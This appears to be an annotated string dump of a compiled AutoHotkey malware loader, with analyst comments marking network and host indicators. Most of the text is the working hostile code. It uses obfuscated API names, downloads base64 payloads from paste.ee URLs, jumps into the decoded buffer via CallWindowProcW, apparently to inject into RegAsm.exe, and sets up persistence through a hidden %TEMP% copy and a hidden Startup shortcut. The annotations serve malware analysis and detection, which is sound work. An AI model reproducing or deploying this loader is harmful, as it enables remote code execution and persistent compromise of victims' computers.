; in reverse character order, with "@@@" standing in for "o" and "###" for "r".
; The assembled raw value is "Wc@@@###Pw@@@dniWllaC\lld.23###esu", so the real
; name never appears as a contiguous string in a strings dump of the binary.
GkAAUWLJK := "W"
GkAAUWLJK.= "c"
GkAAUWLJK.= "@@@"
GkAAUWLJK.= "###"
GkAAUWLJK.= "P"
GkAAUWLJK.= "w"
GkAAUWLJK.= "@@@"
GkAAUWLJK.= "d"
GkAAUWLJK.= "n"
GkAAUWLJK.= "i"
GkAAUWLJK.= "W"
GkAAUWLJK.= "l"
GkAAUWLJK.= "l"
GkAAUWLJK.= "a"
GkAAUWLJK.= "C"
GkAAUWLJK.= "\"
GkAAUWLJK.= "l"
GkAAUWLJK.= "l"
GkAAUWLJK.= "d"
GkAAUWLJK.= "."
GkAAUWLJK.= "2"
GkAAUWLJK.= "3"
GkAAUWLJK.= "###"
GkAAUWLJK.= "e"
GkAAUWLJK.= "s"
GkAAUWLJK.= "u"
; Undo the placeholder masking: "@@@" -> "o", then "###" -> "r".
GkAAUWLJK := RegExReplace(GkAAUWLJK, "@@@", "o")
GkAAUWLJK := RegExReplace(GkAAUWLJK, "###", "r")
; Flip() (defined in this script) reverses the string, which yields
; "user32.dll\CallWindowProcW". The result is used as a DllCall target below.
MzwkfOyxg := Flip(GkAAUWLJK)
; Analyst note: builds a file path under the Windows directory, one fragment per
; statement, with "@" standing in for "r" and "#" for "e". Before substitution
; the suffix reads "\Mic@osoft.N#T\Fram#work\v2.0.50727\RegAsm.#x#".
PNxNfvcbR:= A_WinDir
PNxNfvcbR.= "\"
PNxNfvcbR.= "M"
PNxNfvcbR.= "i"
PNxNfvcbR.= "c"
PNxNfvcbR.= "@"
PNxNfvcbR.= "o"
PNxNfvcbR.= "s"
PNxNfvcbR.= "o"
PNxNfvcbR.= "f"
PNxNfvcbR.= "t"
PNxNfvcbR.= "."
PNxNfvcbR.= "N"
PNxNfvcbR.= "#"
PNxNfvcbR.= "T"
PNxNfvcbR.= "\"
PNxNfvcbR.= "F"
PNxNfvcbR.= "r"
PNxNfvcbR.= "a"
PNxNfvcbR.= "m"
PNxNfvcbR.= "#"
PNxNfvcbR.= "w"
PNxNfvcbR.= "o"
PNxNfvcbR.= "r"
PNxNfvcbR.= "k"
PNxNfvcbR.= "\"
PNxNfvcbR.= "v2.0.50727"
PNxNfvcbR.= "\"
PNxNfvcbR.= "RegAsm"
PNxNfvcbR.= "."
PNxNfvcbR.= "#"
PNxNfvcbR.= "x"
PNxNfvcbR.= "#"
; Unmask to <WinDir>\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.
; The substitutions run over the whole string, including the A_WinDir prefix.
; RegAsm.exe is the .NET assembly registration utility; the script only passes
; its path as a string argument to the DllCall that runs the decoded buffer.
; NOTE(review): for detection, RegAsm.exe starting with no command line and an
; unusual parent process is worth alerting on - confirm against local baselines.
PNxNfvcbR := RegExReplace(PNxNfvcbR, "@", "r")
PNxNfvcbR := RegExReplace(PNxNfvcbR, "#", "e")
; Analyst note: first remote fetch. Creates a WinHttp.WinHttpRequest.5.1 COM
; object and issues an asynchronous GET to a second paste URL (network IoC).
; This request is sent before the connectivity check that appears further down.
pxzaqs77 := "WinHttp.WinHttpRequest.5.1"
iLywLWaUJ := "GET"
pxzaq38 := ComObjCreate(pxzaqs77)
pxzaq38.Open(iLywLWaUJ, "https://paste.ee/r/fsU10", true)
pxzaq38.Send()
; Block until the response arrives; no status code or error check is performed.
pxzaq38.WaitForResponse()
; The response body is kept as text and later base64-decoded into "Mcode".
vsdBOsnmU := pxzaq38.ResponseText
tksgBBAAY := vsdBOsnmU
; Analyst note: assembles "Wininet.dll\InternetGetConnectedState" from fragments
; so the API name is not present as one contiguous string.
oZnWluxIp := "W"
oZnWluxIp.= "i"
oZnWluxIp.= "n"
oZnWluxIp.= "i"
oZnWluxIp.= "n"
oZnWluxIp.= "e"
oZnWluxIp.= "t"
oZnWluxIp.= "."
oZnWluxIp.= "d"
oZnWluxIp.= "ll\"
oZnWluxIp.= "Inte"
oZnWluxIp.= "rnet"
oZnWluxIp.= "Get"
oZnWluxIp.= "Conn"
oZnWluxIp.= "ected"
oZnWluxIp.= "S"
oZnWluxIp.= "ta"
oZnWluxIp.= "te"
; Flip("rts") evaluates to the DllCall type name "str". The call's return value
; is stored in Connected and gates the rest of the script.
Connected := DllCall(oZnWluxIp, Flip("rts"), 0x40,"Int",0)
; Analyst note: main payload stage, entered only when the connectivity check
; returned 1. The closing brace of this block is not present in the listing;
; presumably string extraction dropped it along with other very short lines.
if (Connected = 1){
sleep,1000
; Second remote fetch: GET the paste URL held in tutVTtpJk (network IoC).
pxzaqsz74 := ComObjCreate(pxzaqs77)
pxzaqsz74.Open(iLywLWaUJ, tutVTtpJk, True)
pxzaqsz74.Send()
pxzaqsz74.WaitForResponse()
pxzaqsze41 := pxzaqsz74.ResponseText
; The hosted text is masked base64: "#" stands for "w" and "@" for "A", so the
; paste content does not decode as-is until these substitutions are applied.
pxzaqsze41 := RegExReplace(pxzaqsze41, "#", "w")
pxzaqsze41 := RegExReplace(pxzaqsze41, "@", "A")
; Base64-decode both downloads into binary buffers: bBuf from the second fetch,
; Mcode from the first.
Base64dec(bBuf,pxzaqsze41)
Base64dec(Mcode,tksgBBAAY)
; MzwkfOyxg resolves to user32.dll\CallWindowProcW and Flip("rtP")/Flip("rts")
; to the type names "Ptr"/"str". The first parameter of CallWindowProcW is the
; procedure address to call, so control transfers to the start of the decoded
; Mcode buffer, with the RegAsm.exe path, the address of bBuf and two zeros as
; its arguments.
; NOTE(review): what Mcode then does is not visible in this listing. The argument
; shape (host executable path plus second buffer) suggests a loader that runs
; bBuf inside that host process - confirm by analysing the downloaded blobs.
DllCall(MzwkfOyxg, Flip("rtP"), &Mcode, Flip("rts"), PNxNfvcbR, Flip("rtP"), &bBuf, "Uint", 0, "Uint", 0)
; Persistence: copy the running executable into %TEMP% (overwriting) and mark the
; copy System + Read-only + Hidden.
FileCopy,%A_Scriptfullpath%, %A_Temp%\%A_Scriptname%,1
FileSetAttrib, +SRH, %A_Temp%\%A_Scriptname%,1
; Create a Startup-folder shortcut with an empty base name (".lnk") that targets
; the %TEMP% copy, then hide it the same way. Host IoCs: a hidden ".lnk" in the
; user's Startup folder and a hidden/system executable in %TEMP%.
FileCreateShortcut, "%A_Temp%\%A_ScriptName%", %A_Startup%\.lnk,,,,1
FileSetAttrib, +SRH, %A_Startup%\.lnk,1
sleep,1000
; Base64dec(ByRef out, ByRef in): decodes the base64 text in the second argument
; into the first argument as raw bytes, and returns the byte count reported by
; the first (size-query) call.
; Analyst note: the closing brace of this function is not present in the listing;
; presumably string extraction dropped it.
Base64dec( ByRef oenatpZac, ByRef pxzaqszedm44 ) {
; Decoy-padded API name: removing the match of ".{6}FUT" ("015NOVFUT") leaves
; "Crypt32.dll\CryptStringToBinary".
stoZnWluxIp := "Crypt32.dll\015NOVFUTCryptStringToBinary"
newStr := RegExReplace(stoZnWluxIp, ".{6}FUT", "")
; First call: the W or A variant is chosen by A_IsUnicode, flags value 1 is
; CRYPT_STRING_BASE64, and the output buffer argument is 0, so only the required
; size is written to Bytes. Flip("tnI LCEDC") evaluates to "CDECL Int".
DllCall( newStr ( A_IsUnicode ? "W" : "A" ), UInt,&pxzaqszedm44
, UInt,StrLen(pxzaqszedm44), UInt,1, UInt,0, UIntP,Bytes, Int,0, Int,0, Flip("tnI LCEDC") )
; Size the output variable; the capacity is doubled in Unicode builds.
VarSetCapacity( oenatpZac, Req := Bytes * ( A_IsUnicode ? 2 : 1 ) )
; Second call: same API, this time named via a reversed string literal, decoding
; into the output variable. Neither call's return value is checked.
DllCall( Flip("yraniBoTgnirtStpyrC\lld.23tpyrC") ( A_IsUnicode ? "W" : "A" ), UInt,&pxzaqszedm44
, UInt,StrLen(pxzaqszedm44), UInt,1, Str,oenatpZac, UIntP,Req, Int,0, Int,0, Flip("tnI LCEDC") )
Return Bytes
; Flip(Str): returns Str with its characters in reverse order. The script uses
; it to recover API and type names that are stored reversed.
; Analyst note: the closing brace of this function is not present in the listing;
; presumably string extraction dropped it.
Flip( Str) {
; These assignments set fields on the default string base object to function
; names. No functions with these names are visible in this listing and the
; values are not used by the reversal below.
; NOTE(review): likely filler copied from a string-helper library - confirm.
"".base.Left := "String_Left"
"".base.Right := "String_Right"
"".base.Replace := "String_Replace"
"".base.LTrim := "String_LTrim"
"".base.RTrim := "String_RTrim"
"".base.Count := "String_Count"
"".base.Times := "String_Times"
"".base.Split := "String_Split"
; Walk Str one character at a time, prepending each character to nStr, which
; leaves nStr holding the reversed string.
Loop, Parse, Str
nStr=%A_LoopField%%nStr%
Return nStr
; Terminates the script process. No hotkeys or timers are visible in this
; listing, so nothing keeps the AutoHotkey process resident after this point.
ExitApp
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:v3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity version="1.1.00.00" name="AutoHotkey" type="win32" /><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/></application></compatibility><v3:application><v3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"><dpiAware>true</dpiAware></v3:windowsSettings></v3:application><v3:trustInfo><v3:security><v3:requestedPrivileges><v3:requestedExecutionLevel level="asInvoker" uiAccess="false" /></v3:requestedPrivileges></v3:security></v3:trustInfo></assembly> PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD